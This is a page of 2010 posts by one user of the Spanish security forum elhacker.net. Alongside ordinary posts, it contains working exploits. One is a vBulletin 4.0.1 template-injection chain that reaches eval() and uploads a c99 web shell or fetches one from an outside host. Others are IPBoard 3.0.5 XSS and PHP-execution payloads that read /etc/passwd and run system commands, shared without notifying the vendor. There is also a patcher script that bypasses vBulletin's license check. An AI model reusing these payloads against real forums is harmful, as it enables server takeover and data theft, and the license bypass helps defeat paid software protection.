elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Temas
Páginas: 1 ... 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 [30] 31 32 33 34 35 36 37 38 39 40 41 42
291  Informática / Software / Montar imagen en Windows 7 en: 22 Agosto 2010, 09:12 am
Hola, actualmente estoy haciendo un dvd con una recopilación de softwares en .iso y por el momento le adjunté el alcohol120 pero me entra el remordimiento porque lleva crack xDD

Alguien conoce algún software que sea gratuito que me permita montar imagenes o cree unidades virtuales en windows 7?

Intenté con el daemon pero no funciona bien en windows 7.
292  Seguridad Informática / Seguridad / MOVIDO: ayuadame a descifra esto en: 18 Junio 2010, 13:06 pm
El tema ha sido movido a Desafíos - Wargames.

https://foro.elhacker.net/index.php?topic=240781.0
293  Seguridad Informática / Nivel Web / Auditoría de seguridad hacia OpenCart 1.4.7 en: 31 Mayo 2010, 09:14 am

Proyecto OpenVuln

Es un proyecto destinado a realizar auditorías de seguridad a nivel WEB hacia el software de OpenVuln 1.4.7 con la finalidad de que sus desarrolladores puedan crear cada dia un software mas robusto y seguro.



Integrantes - (participando en el proyecto)



Vulnerabilidades encontradas
10
(0 reportadas + 0 notificadas + 10 privadas)
Próximo disclosure: 7 Junio 2010



Todos los resultados se irán mostrando en este lugar con todos sus detalles.

Si tienes algún comentario, pregunta, aporte, quieres participar  o lo que necesites puedes hacerlo en este post:
http://foro.elhacker.net/nivel_web/opencart_se_niega_a_arreglar_vulnerabilidades_y_sabotea_los_parches-t294544.0.html

Si hay algúna vulnerabilidad o bug que no aparece en este lugar es porque todavía se mantiene en privado hasta cumplirse el plazo estimado para su posible reparación o publicación futura.


294  Foros Generales / Foro Libre / Microsoft recomienda usar Internet Explorer 6 en: 4 Mayo 2010, 06:22 am
yo tampoco lo creí cuando lo vi pero así es, en windows live entré a modificar un dato desde firefox en linux y me ha salido un cuadro diciendome que me actualize a internet explorer 6 o superior.

todavía pretenden que la gente siga usando ie6???



Esto aparece en las opciones avanzadas de la configuración de la cuenta.
295  Foros Generales / Foro Libre / Entrevista de tele5 a sdc en: 1 Mayo 2010, 06:11 am
Lo que mas da risa es que presentan a sdc mostrando mi msn jajajajja fail xD

296  Seguridad Informática / Nivel Web / [CYH] PHP-IDS en: 19 Marzo 2010, 20:41 pm
Can You Hack?
Tiro al blanco con PHP-IDS

CYH es un evento donde todos los usuarios del foro pueden participar y ganar premios y realizar todo tipo de retos :D



Premio
El que mas inyecciones logre realizar en PHP-IDS sobre diferentes reglas se ganará una cuenta sunick@elhacker.net

Fecha de término
30 Abril 2010

Personas que han acertado en el blanco
  • WHK (DoS) [Cantidad: 1] [No participante]

En esta ocación le daremos de tiro al blanco a PHP-IDS, un sistema muy similar a htmlpurifier, un sistema que filtra todo intento de ataque haciendo que una aplicación WEB sea mas segura pero no impenetrable.
http://php-ids.org/

El demo está en este lugar:
http://demo.php-ids.org/

La idea es poder inyectar agún tipo de código maligno que pueda afectar la seguridad de tu aplicación WEB o hacer que aparezca una ejecución de código en javascript.
Al escribir tu inyección en la caja de texto que aparece en el demo se testeará de múltiples formas:
Código
  1. <table id="clean">
  2. <tr>
  3.  <td><strong>HTML injection</strong></td>
  4.  <td><?php echo $_POST['test']; ?></td>
  5. </tr>
  6. <tr>
  7.  <td><strong>a href and onclick doublequoted</strong></td>
  8.  <td><a onclick="<?php echo $_POST['test']; ?>" href="?test=<?php echo $_POST['test']; ?>">click</a></td>
  9. </tr>
  10. <tr>
  11.  <td><strong>a href and onclick singlequoted</strong></td>
  12.  <td><a onclick='<?php echo $_POST['test']; ?>' href='?test=<?php echo $_POST['test']; ?>'>click</a></td>
  13. </tr>
  14. <tr>
  15.  <td><strong>a href and onlclick no quotes</strong></td>
  16.  <td><a onclick=<?php echo $_POST['test']; ?> href=?test=<?php echo $_POST['test']; ?>>click</a></td>
  17. </tr>
  18. <tr>
  19.  <td><strong>script tags</strong></td>
  20.  <td><script><?php echo $_POST['test']; ?></script></td>
  21. </tr>
  22. </table>

Cuando PHP-IDS detecta un intento de ataque te detendrá y mostrará las reglas en expresión regular que impidió su ejecución.

Claramente yo y sdc nos excluimos de los premios pero no del concurso :D asi que nosotros no contamos para la decisión final del ganador.
297  Seguridad Informática / Nivel Web / Codigo de ejecución PHP en VBulletín 4.0.1 (bypass al filtro de funciones) en: 21 Febrero 2010, 23:24 pm
Antes de comenzar a explicar debo decir que esto se encuentra solamente en el sistema de administración xD asi que solamente los que tengan acceso podrán ejecutar esto.

Estaba viendo un demo oficial de vbulletín y quería ver si podía reproducir la misma vulnerabilidad de ipboard ya que son practicamente los mismos desarrolladores pero me encontré con algunos problemas.
( http://foro.elhacker.net/nivel_web/codigo_de_ejecucion_php_y_xss_en_ipboard_305-t285256.0.html )

Primero que nada acá no se pueden ejecutar funciones directamente como ipboard aunque la sintaxis es muy similar al editar un theme.
Lo que si pude lograr es inyectar código arbitrario en las las llamas {vb:raw}.
http://demo.vbulletin.com/admincp/template.php?s=&do=add&dostyleid=2&title=FORUMDISPLAY&group=forumdisplay

Para llamar a un título usas lo siguiente:
Código:
<title>{vb:raw foruminfo.title_clean}</title>

Por lo tanto me imaginé que debería llamar a alguna clase utilizando eval, o sea algo asi como
Código:
eval('$clase->'.$variable.'();');

Así que me puse a experimentar tratando de escapar con comillas y puntos y comas y a final que pude escapar del eval e inyectar código de la siguiente forma:
Código:
{vb:raw $voptions[eval(stripslashes(html_entity_decode($_GET[x])))]}

Lo que sucede es que si tratas de exponer directamente la función entonces vbulletin te va a decir que no es una variable válida asi que le damos en el gusto y lo encerramos en una variable válida.
Ahora si intentan poner esto en cualquier parte del theme no va a funcionar porque vbulletin utiliza un filtro y tiene una whitelist con las funciones que solamente pueden utilizarse, por lo tanto les va a rechazar la función eval().

Dentro del tag <title></title> es donde pueden ejecutarse las funciones de esta forma dentro de una variable válida y el filtro no va a saltar porque no lo procesará de forma correcta.

Con esto ya podemos hacer un
http://demo.vbulletin.com/index.php?x=if($_FILES){copy($_FILES['archivo']['tmp_name'],'c99.php');}exit;

y desde el firebug editamos el DOM del contenido HTML para escribir un form:
Código
  1. <form method="post" enctype="multipart/form-data">
  2. <input name="archivo" type="file">
  3. <input value="Enviar" type="submit">
  4. <input type="hidden" name="adminhash" value="baa10b27ca5198266ab2cf09f2b101e4" />
  5. <input type="hidden" name="securitytoken" value="1266787977-14112f434378273e323fe65d5e7fc43535be4705" />
  6. </form>

Ojo que vbulletín nos pedirá el token de nuestra sesión el cual lo puse en un input de tipo hidden y con eso ya subimos la c99 o si no la clásica con file_put_contents('c99.php', file_get_contents('http://r57.gen.tr/99.txt'));

Saludos.
298  Seguridad Informática / Nivel Web / Codigo de ejecución PHP y XSS en IPBoard 3.0.5 en: 21 Febrero 2010, 07:13 am
Estaba viendo una demostración del IPBoard que pude obtener desde la web oficial y viendo algunas opciones me pude dar cuenta que puedes ejecutar código arbitrario y xss en dos lados diferentes.

Antes de comenzar a explicar debo decir que esto se encuentra solamente en el sistema de administración xD asi que solamente los que tengan acceso podrán ejecutar ambas cosas.

El xss se encuentra al editar el logo:
http://ejemplo/admin/index.php?adsess=[sesion]&app=core&&module=templates&section=easylogo&do=finish

En este lugar encontraremos un input para poner el logo del theme, pero no podemos inyectar código html porque nos filtra las comillas simples y dobles, asi que como lo podemos evadir?
VBulletín utiliza variables de esta forma: {style_image_url}/logo.png asi que dentro de {} no nos filtran nada asi que desde ahi podemos inyectar de la siguiente manera:
Citar
logo.png<{'onerror=alert(0) x='}

Con eso ya puedes ejecutar código arbitrario desde el theme.

El código de ejecución en php se encuentra en la edición del theme.
Por eejmplo si al theme le ponemos <?php echo 'x'; ?> no lo ejecutará sino que lo mostrará solamente ya que lanza un echo completo, pero si ejecuta las variables en php, por ejemplo {$x} ya que el theme completo se procesa en eval y echo.

Si no podemos usar tags de php como escapamos y ejecutamos código?....
así:
Código

Tube que encerrar la variabe en dos llaves diferentes porque vbulletin me filtraba las llaves sin un $.
También reemplaza los puntos a htmlentities y utiliza addslashses xD asi que le aplicamos las funciones inversas.

Demo online:
http://a133.ipsdemo.ipslink.com/index.php?x=echo file_get_contents('../../../../../../../etc/passwd');exit;
y
view-source:http://a133.ipsdemo.ipslink.com/index.php?x=system%28%27ls%20-la%27%29;exit;

Ojo que el demo que me dieron dura 24 horas asi que si no ven el enlace se hacen uno nuevo y lo prueban.

PD: a servidores como el del demo que tiene allow url open activo pueden subirse una c99 y hacer full backup :P
PD2: a vbulletín no les aviso de la vulnerabilidad porque ellos ganan dinero vendiendo el sistema y tienen el suficiente dinero como para contratar a auditores, yo no les hago el trabajo porque ellos nunca me han dado nada, no así los de libre pago como smf, ellos si aportan muchisimo a la gente asi que a ellos si les reportamos primero :P.
299  Seguridad Informática / Nivel Web / [PCu] Instalar VBulletin sin utilizar licencias de pago en: 20 Febrero 2010, 23:31 pm

PCu es una selección de temas orientados a los parches de sistemas WEBs (PCu = Parche Curita).

Bueno, primero nos conseguimos los archivos de vbulletín, ahora lo montamos en el servidor normalmente y cuando hagamos nuestro archivo de configuraciones veremos que nos redireccionará hacia http://ejemplo/vbulletin/install/install.php y nos pide un numero de serie :o asi que si no tenemos ese mágico numero de serie no podremos instalar el sistema.

Vamos al directorio de instalación y hacemos ingeniería inversa, asío como en la electrónica mi profesor siempre me decía que si queremos saber como funciona algo solo debemos recorrer el camino que hace la energía eléctrica, asi que nosotros para saber como hace la validación seguiremos las funciones y las inclusiones en orden una por una.

Abrimos el archivo /install/install.php y encontramos que la única inclusión que hay es hacia require_once('./installsteps.php'); sin anteponer ninguna función y despues finaliza el script asi que dejamos tranquilo ese archivo y nos vamos a editar /install/installsteps.php.
En este archivo lo primero que vemos cuando lo ejecutas es un if con una comparación:
Código
  1. if ($_GET['step'] > 2 OR $_POST['step'] > 2)
  2. {
  3. require_once('./installcore.php');
  4. // connected to the database now lets load schema
  5. require_once(DIR . '/install/mysql-schema.php');
  6. }
  7. else
  8. {
  9. if ($_ENV['REQUEST_URI'] OR $_SERVER['REQUEST_URI'])
  10. {
  11. $scriptpath = $_SERVER['REQUEST_URI'] ? $_SERVER['REQUEST_URI'] : $_ENV['REQUEST_URI'];
  12. }
  13. else
  14. {
  15. if ($_ENV['PATH_INFO'] OR $_SERVER['PATH_INFO'])
  16. {
  17. $scriptpath = $_SERVER['PATH_INFO'] ? $_SERVER['PATH_INFO']: $_ENV['PATH_INFO'];
  18. }
  19. else if ($_ENV['REDIRECT_URL'] OR $_SERVER['REDIRECT_URL'])
  20. {
  21. $scriptpath = $_SERVER['REDIRECT_URL'] ? $_SERVER['REDIRECT_URL']: $_ENV['REDIRECT_URL'];
  22. }
  23. else
  24. {
  25. $scriptpath = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_ENV['PHP_SELF'];
  26. }
  27.  
  28. if ($_ENV['QUERY_STRING'] OR $_SERVER['QUERY_STRING'])
  29. {
  30. $scriptpath .= '?' . ($_SERVER['QUERY_STRING'] ? $_SERVER['QUERY_STRING'] : $_ENV['QUERY_STRING']);
  31. }
  32. }
  33. define('SCRIPTPATH', $scriptpath);
  34. define('SKIPDB', true);
  35.  
  36. require_once('./installcore.php');
  37. }

No estamos enviando ninguna variable GET asi que se está activando el "else" cuando lo ejecutamos y solo se hacen declaraciones de rutas y la única inclusion que hay es hacia installcore.php pero como sabremos si es ese archivo que hace la validación o es algo mas hacia abajo?...
Probamos poniendo "exit;" despues de la inclusion, algo así como:
Código
  1. require_once('./installcore.php');

Me sigue apareciendo la pantalla de verificación, asi que le pongo el exit antes de la inclusion:
Código
  1. require_once('./installcore.php');

Ahi se queda la pantalla en blanco asi que ya sabemos que la pantalla de validación se está llamando desde ahi, por lo tanto lo abrimos y nos encontramos con esto:
Código
  1. require_once('./install/init.php');
  2. require_once(DIR . '/install/functions_installupgrade.php');
  3. require_once(DIR . '/install/install_language_en.php');
  4. require_once(DIR . '/includes/functions.php');
  5. require_once(DIR . '/includes/adminfunctions.php');
  6. $steptitles = $install_phrases['steps'];
  7. require_once(DIR . '/install/authenticate.php');

Pero ahora como sabremos que archivo es el que autentifica?. Le ponemos un exit al final de todas estas inclusiones para ver si lo hace alguno de estos archivos o se hace mas abajo la validación:
Código
  1. require_once('./install/init.php');
  2. require_once(DIR . '/install/functions_installupgrade.php');
  3. require_once(DIR . '/install/install_language_en.php');
  4. require_once(DIR . '/includes/functions.php');
  5. require_once(DIR . '/includes/adminfunctions.php');
  6. $steptitles = $install_phrases['steps'];
  7. require_once(DIR . '/install/authenticate.php');

Acá vemos que la pantalla sigue apareciendo asi que subimos archivo por archivo:
Código
  1. require_once('./install/init.php');
  2. require_once(DIR . '/install/functions_installupgrade.php');
  3. require_once(DIR . '/install/install_language_en.php');
  4. require_once(DIR . '/includes/functions.php');
  5. require_once(DIR . '/includes/adminfunctions.php');
  6. $steptitles = $install_phrases['steps'];
  7. require_once(DIR . '/install/authenticate.php');

Ahi se queda en blanco, eso quiere decir que autentificate no se alcanzó a ejecutar y ese es el archivo que nos detiene la instalación, por lo tanto dejamos tranquilo estos archivos y nos vamos directamente hacia autentificate.php.
Ahi vemos lo siguiente:
Código
  1. if ($vbulletin->GPC['bbcustomerid'] !== CUSTOMER_NUMBER)

Nos está haciendo comparación con nuestro id de licencia asi que lo reemplazamos por esto:
Código
  1. if (1 == 2)

Y listo! ya podemos utilizar vbulletín sin tener que pasar pro el sistema de validación de licencias. Ahora si alguien quiere utilizarlo entonces no le haga nada y pague por este buén sistema.

Hagamos un parchador automático:
Código
  1. <?php
  2. $finstall = 'install/authenticate.php';
  3. if(!$buffer = file_get_contents($finstall)){
  4.  die('Imposible obtener el archivo '.$finstall);
  5. }
  6. $payload = '$vbulletin->GPC[\'bbcustomerid\'] !== CUSTOMER_NUMBER';
  7. if(strpos($buffer, $payload) > 0){
  8.  $buffer = str_replace($payload, '1==2', $buffer);
  9.  if(file_put_contents($finstall, $buffer)){
  10.   header('location: /'); /* Procede la instalación */
  11.  }else{
  12.   die('Imposible sobreescribir el archivo '.$finstall);
  13.  }
  14. }else{
  15.  die('La versi&oacute;n de VBullet&iacute;n es incompatible');
  16. }
  17. ?>

Lo dejas en el directorio de vbulletín y despues lo visualizas, cuando comienze la instalación del sistema lo borras.
300  Seguridad Informática / Nivel Web / [PCu] Como modificar el footer de SMF incluyendo el copyright en: 20 Febrero 2010, 19:33 pm

PCu es una selección de temas orientados a los parches de sistemas WEBs (PCu = Parche Curita).

¿Se han fijado que a veces uno necesita modificar el footer de SMF pero es un poco dificil porque los desarrolladores no explican como hacerlo y cuando por fin encuentras la función que lo hace al modificarlo te da un error de theme?.

Al grano. Buscamos el archivo subs/Subs.php y buscamos esto:
Código
  1. // Show the copyright...
  2. function theme_copyright($get_it = false)
  3. { ...

Esta función es el que se encarga del copyright y podemos evadir unos cuantos googledorks y gente en busca de foros vulnerables ya que nos canta de plano la versión del mismo.
Ahora si queremos eliminar completamente el copyright no podemos darle un return true o simplemente eliminar el contenido porque el sistema nos alertará. Hay formas de eliminar esa alerta pero mejor vamos a hacerlo mas sencillo.

Buscamos en nuestro theme el archivo index.template.php y buscamos la siguiente linea:
Código
  1. function template_main_below(){ ...

Ahora en ese lugar saldrá la impresión del copyright junto a la declaración de varias variables ocultas.
A menos que modifiquemos el subs.php podemos escribir directamente un <!-- --> pero el problema es que podría dar conflicto con algunas actualizaciones del smf asi que modificamos el theme sin la necesidad de tocar los subs.

Donde dice:
Código
  1. theme_copyright();

si le ponemos /**/ o lo eliminamos da error, si le ponemos <!-- --> o <div style="display: none también da error por lo tanto le damos el gusto y lo imprimimos pero a nuestra forma :P
Código
  1. theme_copyright();
  2. $pierdete = ob_get_contents();

Iniciamos la encapsulación dle buffer de salida, imprimimos el copyright, lo pasamos a una variable y eliminamos el buffer :P despues podemos darle unset() para eliminarlo aunque no hay necesidad.

Saludos.
Páginas: 1 ... 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 [30] 31 32 33 34 35 36 37 38 39 40 41 42
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines